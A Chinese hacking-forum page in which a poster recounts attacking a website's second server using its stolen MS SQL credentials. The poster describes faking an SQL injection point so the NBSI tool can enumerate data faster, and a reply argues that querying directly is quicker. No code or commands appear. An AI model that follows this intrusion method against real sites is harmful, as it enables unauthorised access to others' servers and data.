敬佩一下! 这次万网害死人了吧!既然让我得到了要进攻的网站的另外一台服务器.220.194.*.*,这台服务器是独立的,旁注过,没有成功,因为不存在另外的网站,这一次,看你往哪跑,一起把他拿下!因为有些原因,从现在开始不提供截图了,希望可以谅解.既然已经得到了数据库的帐号密码,而且他的网站是直接用asp连接上去的,这样说,一定会开了ms sql的端口的.用sql器连接上去,发现自己的权限是db_owner的权限,很多命令不能用,自己手工读去对方的web路径又太麻烦了,而且我也想看看他的结构,既然我有了sql帐号的密码.他的服务器上没有注入漏洞,我可以帮他伪造一个,伪造一个注入点,然后用nbsi来猜解其他的信息,速度会快很多的.
其实很多人都说这个思路好,你想一想,直接在sql查询器里提交快还是伪造注入点用nbsi猜快。很明显,说思路好的人其实自己也不懂。我觉得大家和作者都很应该好好反省么省,为什么连这么简单的东西都不懂。
页:
[1]
2